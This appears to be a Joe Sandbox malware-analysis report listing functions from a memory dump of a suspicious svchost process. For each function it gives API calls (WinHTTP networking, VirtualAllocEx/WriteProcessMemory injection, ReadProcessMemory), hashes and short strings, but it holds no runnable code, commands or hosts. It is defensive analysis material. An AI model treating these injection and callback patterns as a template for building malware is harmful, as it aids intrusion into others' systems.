Instruction ID: 57ee3137514144bf60cce007febeb663930d62935e1599a4d347ca5d36fed9f5
Opcode Fuzzy Hash: c9046dffb573574fc25c40d42e7c3ffdc45ad70a92c9c4164a8d46b4ec7af5c7
Instruction Fuzzy Hash: 85213A72614B8482DB528F16E89039A73A4FB98B84F548116EB8D47775DF38C95ACB80

Function 0000000140002300 Relevance: 1.5, APIs: 1, Instructions: 41comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE ref: 0000000140002351

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b2322952a02dc2e0a26493a2b69036bfafc29e4732a14177607ed35dd8528dd4
Instruction ID: ba2811dbea9e4b9e57d6fd7a1f1aade179480009a3f334097c8843c2f9a4222c
Opcode Fuzzy Hash: b2322952a02dc2e0a26493a2b69036bfafc29e4732a14177607ed35dd8528dd4
Instruction Fuzzy Hash: CE11E536610B4482EB01CF2AE454399B3A1F78CB88F698025DB8C47724DF3AC59AC750

Function 0000000140003800 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE ref: 0000000140003855

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 83407514344c0de2661e4134d07246bc1273eb1b6fe189e12909b0eb5b2e5137
Instruction ID: 51f4b8a512a9febe15be9ff3674927ed5db98c6055c24a172452396fe9aceb41
Opcode Fuzzy Hash: 83407514344c0de2661e4134d07246bc1273eb1b6fe189e12909b0eb5b2e5137
Instruction Fuzzy Hash: 02F01531A14B84C1EA02AB27E8543E963A0F38CFC1F4480A5EB0A0B3B2CE38C945C780

Function 0000000140006D20 Relevance: 1.4, APIs: 1, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b102b2896f1fd4ed24110deb6751ec640bd2f57c3670500502afc6d79c5c785
Instruction ID: 64b1c6246bd7fc45bfa2b8b84f8586b4ddedd3468c74264c1831ae379150dc16
Opcode Fuzzy Hash: 6b102b2896f1fd4ed24110deb6751ec640bd2f57c3670500502afc6d79c5c785
Instruction Fuzzy Hash: B6717E72604B8586EB51CF26F4503EAB7A1F789BC8F544026FB8D93A69DF39C905CB40

Non-executed Functions

Function 00000001400179C0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 245memorytimeCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000140017A02
WinHttpCrackUrl.WINHTTP ref: 0000000140017A33
WinHttpOpen.WINHTTP ref: 0000000140017B19
WinHttpSetTimeouts.WINHTTP ref: 0000000140017B48
WinHttpConnect.WINHTTP ref: 0000000140017B5A
WinHttpOpenRequest.WINHTTP ref: 0000000140017BF0
WinHttpSendRequest.WINHTTP ref: 0000000140017C1A
WinHttpReceiveResponse.WINHTTP ref: 0000000140017C2D
WinHttpQueryHeaders.WINHTTP ref: 0000000140017C66
WinHttpQueryDataAvailable.WINHTTP ref: 0000000140017CA0
WinHttpReadData.WINHTTP ref: 0000000140017CF5

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

WinHttpCloseHandle.WINHTTP ref: 0000000140017D26
WinHttpCloseHandle.WINHTTP ref: 0000000140017D34
WinHttpCloseHandle.WINHTTP ref: 0000000140017D3D
HeapFree.KERNEL32 ref: 0000000140017D5A
HeapFree.KERNEL32 ref: 0000000140017D74
HeapFree.KERNEL32 ref: 0000000140017D96

Strings

h, xrefs: 0000000140017A14

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseFreeHandleHeap$DataOpenQueryRequest$AddressAvailableConnectCrackHeadersLibraryLoadProcReadReceiveResponseSendTimeoutsmemset
String ID: h
API String ID: 924098880-2439710439
Opcode ID: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
Instruction ID: 1498001942143cf4250ef2d81509e8fca94ec240472a1244b462215344734eb3
Opcode Fuzzy Hash: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
Instruction Fuzzy Hash: FCA19031604A858AE762CF27A8547EA77B1FB8DBC8F044115EF4D4BBA8DF3AC5458740

Function 0000000140003860 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D420: WinHttpOpen.WINHTTP ref: 000000014000D49C

HeapFree.KERNEL32 ref: 0000000140003A0A
HeapFree.KERNEL32 ref: 0000000140003A1F
WinHttpCloseHandle.WINHTTP ref: 0000000140003B1C
WinHttpConnect.WINHTTP ref: 0000000140003B3C
HeapFree.KERNEL32 ref: 0000000140003C24
HeapFree.KERNEL32 ref: 0000000140003D1C
HeapFree.KERNEL32 ref: 0000000140003D37
HeapFree.KERNEL32 ref: 0000000140003D52
HeapFree.KERNEL32 ref: 0000000140003D6D
HeapFree.KERNEL32 ref: 0000000140003D88
HeapFree.KERNEL32 ref: 0000000140003D9D
WinHttpCloseHandle.WINHTTP ref: 0000000140003DAD
WinHttpCloseHandle.WINHTTP ref: 0000000140003DBB
WinHttpCloseHandle.WINHTTP ref: 0000000140003DC9

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

HeapFree.KERNEL32 ref: 0000000140003DE5

Strings

gfff, xrefs: 0000000140003CC0

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$Http$CloseHandle$ConnectOpenmemset
String ID: gfff
API String ID: 2669603317-1553575800
Opcode ID: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
Instruction ID: e375e4b6913abfcb066fb2510dea88db1f1922a69a85b8abfbf5752ff8901941
Opcode Fuzzy Hash: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
Instruction Fuzzy Hash: 64F17D72600B8482EB93DF16E8547EA27A8FB8DBD4F04411AEB8A577B5DF38C945C740

Function 0000000140015340 Relevance: 22.9, APIs: 15, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00000001400153B0
HeapFree.KERNEL32 ref: 00000001400153CC
HeapFree.KERNEL32 ref: 00000001400153E8
HeapFree.KERNEL32 ref: 0000000140015404
_time64.MSVCRT ref: 00000001400155E4
_time64.MSVCRT ref: 000000014001566F
HeapFree.KERNEL32 ref: 000000014001569D
HeapFree.KERNEL32 ref: 0000000140015706
HeapFree.KERNEL32 ref: 0000000140015722
HeapFree.KERNEL32 ref: 000000014001573E
HeapFree.KERNEL32 ref: 000000014001575A
HeapFree.KERNEL32 ref: 0000000140015776
HeapFree.KERNEL32 ref: 000000014001578B
HeapFree.KERNEL32 ref: 0000000140015420

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

_time64.MSVCRT ref: 00000001400158F2

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_time64$AddressLibraryLoadProcmemset
String ID:
API String ID: 4044016582-0
Opcode ID: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
Instruction ID: 1ff008e7178ffe5c36afa01dae6893e19bf73e557f2170abeac8c26d8b64783f
Opcode Fuzzy Hash: 976164784313fb201fc363347bf02393d1a175d1830bf4b901d432c3735b5581
Instruction Fuzzy Hash: 68F14672200B80C6EB52DF1AD4943EA37A5F788BC5F15812AEB8E9B7A5DF35C485C740

Function 0000000140012820 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 368COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014001286F

Strings

@, xrefs: 0000000140012BF5

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: memset
String ID: @
API String ID: 2221118986-2766056989
Opcode ID: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
Instruction ID: 3b6190bc3fad717221f5bbcce2ae25d4d52b3cf8b168bce159151464274ee265
Opcode Fuzzy Hash: c169588ed08e8372eaba719479e975c479cb340a6a88987632b20084c5243531
Instruction Fuzzy Hash: 15021836610B8485EB62DF26E8907EA67A0F78CBC8F44412AEF8D47B69DF39C154C740

Function 000000014000F310 Relevance: 16.8, APIs: 11, Instructions: 323memorysleeptimeCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000F4FA
HeapFree.KERNEL32 ref: 000000014000F519
GetFileTime.KERNEL32 ref: 000000014000F5E9
_time64.MSVCRT ref: 000000014000F639
_time64.MSVCRT ref: 000000014000F65E
HeapFree.KERNEL32 ref: 000000014000F6A9
Sleep.KERNEL32 ref: 000000014000F705
_time64.MSVCRT ref: 000000014000F7D7
HeapFree.KERNEL32 ref: 000000014000F836
HeapFree.KERNEL32 ref: 000000014000F870
HeapFree.KERNEL32 ref: 000000014000F892

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$_time64$FileSleepTime
String ID:
API String ID: 2289066803-0
Opcode ID: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
Instruction ID: 1ab422d41cd114fbfdff5d5c6448fbea51a6bf4249b6e681b0e7df56046467f6
Opcode Fuzzy Hash: 40ba65c08b9e5bb65b5414c166f13d3b7ca319df4cbb5a065c46412f29ab1c83
Instruction Fuzzy Hash: DFF18B76200B8586EB61DF26E8543EE37A4F789BC8F408126EB8D47BA5CF39C549D740

Function 0000000140018520 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000014001855B
RtlLookupFunctionEntry.KERNEL32 ref: 000000014001857A
RtlVirtualUnwind.KERNEL32 ref: 00000001400185C6
SetUnhandledExceptionFilter.KERNEL32 ref: 000000014001863A
UnhandledExceptionFilter.KERNEL32 ref: 0000000140018647
GetCurrentProcess.KERNEL32 ref: 000000014001864D
TerminateProcess.KERNEL32 ref: 000000014001865B

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
String ID:
API String ID: 3266983031-0
Opcode ID: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
Instruction ID: 6ca92d44798bfbdcd13931f1ba461a477904d21d6d181f3beb0808d86e954708
Opcode Fuzzy Hash: 1c4ec40dd17319df299da24903791129a37fd02a472f3cc71aadb4a76c336ffa
Instruction Fuzzy Hash: C3319275104B4486EB629B16F8843DAB3A4F78C7D4F50411AEB8D47B79DF79C658C700

Function 0000000140013CD0 Relevance: 10.2, APIs: 8, Instructions: 183memorystringCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000140013D2A
lstrlenW.KERNEL32 ref: 0000000140013D3B
HeapFree.KERNEL32 ref: 0000000140013DF9
HeapFree.KERNEL32 ref: 0000000140013E29

Part of subcall function 0000000140011FE0: VirtualAllocEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000140012116

Part of subcall function 0000000140013800: WriteProcessMemory.KERNEL32 ref: 000000014001392E

HeapFree.KERNEL32 ref: 0000000140013EC4
HeapFree.KERNEL32 ref: 0000000140013F6E
HeapFree.KERNEL32 ref: 0000000140013FC5
HeapFree.KERNEL32 ref: 0000000140013FDF

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AllocMemoryProcessVirtualWritelstrlen
String ID:
API String ID: 2980677570-0
Opcode ID: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
Instruction ID: 2dab337ee8d68b7cc9e8264ef1f707780b607853232d03d74ae5f575a22fd722
Opcode Fuzzy Hash: c8bad31549eb03286af95aea3e69b03a8021d278381b3c8cbf91d7313f1d40d0
Instruction Fuzzy Hash: 92814632215B8186E7A28B12E84479BB7A4F78CBD4F044129EFCD87BA5EF38C545CB00

Function 000000014000F8D0 Relevance: 9.0, APIs: 7, Instructions: 225memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBE9

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB3C
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB56
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB74
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FB96
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBB0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000014000FBCA

Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25

Part of subcall function 000000014000BF10: HeapFree.KERNEL32(?,?,?,?,?,000000014000247B,?,?,?,00000001400023F7), ref: 000000014000BFA0

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AddressProc$AllocateProcess$LibraryLoadMemoryRead
String ID:
API String ID: 2491122006-0
Opcode ID: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
Instruction ID: 68c8fbabcff802c526084c53bb8964246dfaaeb998f36def65cd26f4996e6266
Opcode Fuzzy Hash: 09873fec92877f518c362985b5da0a46ce3d3219a83bb375dbd9e82aa2709a25
Instruction Fuzzy Hash: 3AA145B2301B4085FB52DF67E4603EA33A5F788BD8F048529AF5857BA9DF34C845A750

Function 0000000140014080 Relevance: 6.3, APIs: 4, Instructions: 275memoryfileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00000001400143A2

Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027B7
Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027D1
Part of subcall function 0000000140002660: HeapFree.KERNEL32 ref: 00000001400027EB

HeapFree.KERNEL32 ref: 000000014001441B
HeapFree.KERNEL32 ref: 00000001400144DE
HeapFree.KERNEL32 ref: 00000001400144F8

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AddressFileLibraryLoadProcRead
String ID:
API String ID: 387921010-0
Opcode ID: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
Instruction ID: cba2ec3feea0474adde51f7879ad5c737c0c375ffbddc39dfdd9f5c2093ba4f8
Opcode Fuzzy Hash: eadf0efd34f26277e8400af0cfcc570356fd1329ee8f58013c18fc709ca27727
Instruction Fuzzy Hash: 56D15C32604B9586EB21CF66E8503EA77A0F788BC8F544126EF8D4BBA9DF39C545C740

Function 000000014000B7D0 Relevance: 22.8, APIs: 15, Instructions: 333memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000014000B92A
SysFreeString.OLEAUT32 ref: 000000014000B93F
_wtoi.MSVCRT ref: 000000014000BA37
HeapFree.KERNEL32 ref: 000000014000BA79
HeapFree.KERNEL32 ref: 000000014000BA93
rand.MSVCRT ref: 000000014000BAA0
HeapFree.KERNEL32 ref: 000000014000BB84
HeapFree.KERNEL32 ref: 000000014000BB9F
HeapFree.KERNEL32 ref: 000000014000BC51
HeapFree.KERNEL32 ref: 000000014000BC78
HeapFree.KERNEL32 ref: 000000014000BC92
SysFreeString.OLEAUT32 ref: 000000014000BCBA
SysFreeString.OLEAUT32 ref: 000000014000BCCA
HeapFree.KERNEL32 ref: 000000014000BD29
HeapFree.KERNEL32 ref: 000000014000BD4C

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E580: RtlAllocateHeap.NTDLL ref: 000000014000E6A9

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoirand
String ID:
API String ID: 2238110293-0
Opcode ID: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
Instruction ID: 24ed72427a13ddd5fcc77b1a0f8ca7dcc51255d65edbd16390ea418555290099
Opcode Fuzzy Hash: 5ac5ed8ab6b7965b0a15b53e9b8ab694a50f8e425c364abc59f255adc166618d
Instruction Fuzzy Hash: B4E15CB6201B8486EB62DF16E8507EA77A0FB89BC8F444025EF4E47B69DF39C545C700

Function 0000000140006100 Relevance: 22.8, APIs: 15, Instructions: 291memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001FA0: SysFreeString.OLEAUT32 ref: 0000000140001FE4
Part of subcall function 0000000140001FA0: SysFreeString.OLEAUT32 ref: 0000000140001FF3
Part of subcall function 0000000140001FA0: ??3@YAXPEAX@Z.MSVCRT ref: 0000000140001FFC
Part of subcall function 0000000140001FA0: HeapFree.KERNEL32 ref: 0000000140002030

SysFreeString.OLEAUT32 ref: 00000001400061EB
SysFreeString.OLEAUT32 ref: 00000001400061FE
SysFreeString.OLEAUT32 ref: 0000000140006214
SysFreeString.OLEAUT32 ref: 0000000140006233
SysFreeString.OLEAUT32 ref: 000000014000623D
HeapFree.KERNEL32 ref: 0000000140006266
SysFreeString.OLEAUT32 ref: 0000000140006506
SysFreeString.OLEAUT32 ref: 0000000140006519
SysFreeString.OLEAUT32 ref: 0000000140006527
SysFreeString.OLEAUT32 ref: 0000000140006565
SysFreeString.OLEAUT32 ref: 000000014000656F
HeapFree.KERNEL32 ref: 00000001400065AA

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap$??3@
String ID:
API String ID: 3062846050-0
Opcode ID: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
Instruction ID: 567a171887cd63558544f340f6ae29d700814bafcf893e5afe614293ba1669bb
Opcode Fuzzy Hash: 25cf90377470c744e4eee7f6f1cc8f0c0b72b68b3d3dfc4207a14fcec5be35b2
Instruction Fuzzy Hash: B3D14D76201A8186EB62DF26E8503EE67A1F78CBC8F144125EF8E57B69DF39C549C700

Function 0000000140005E10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 203COMMON

Download Yara Rule

APIs

tolower.MSVCRT ref: 0000000140005EB8
SysFreeString.OLEAUT32 ref: 0000000140005F20
SysFreeString.OLEAUT32 ref: 0000000140005F33
tolower.MSVCRT ref: 0000000140005F97
_wtoi.MSVCRT ref: 0000000140005FCB

Strings

run, xrefs: 0000000140006042
mcco, xrefs: 0000000140005F73
mcco, xrefs: 0000000140005EF8

Memory Dump Source

Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeStringtolower$_wtoi
String ID: mcco$mcco$run
API String ID: 3767767869-3413444080
Opcode ID: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
Instruction ID: 16d87dde47dbfec4f71874680f490213c2a4b8fef5ea2d831d7f44a55ef8ae21
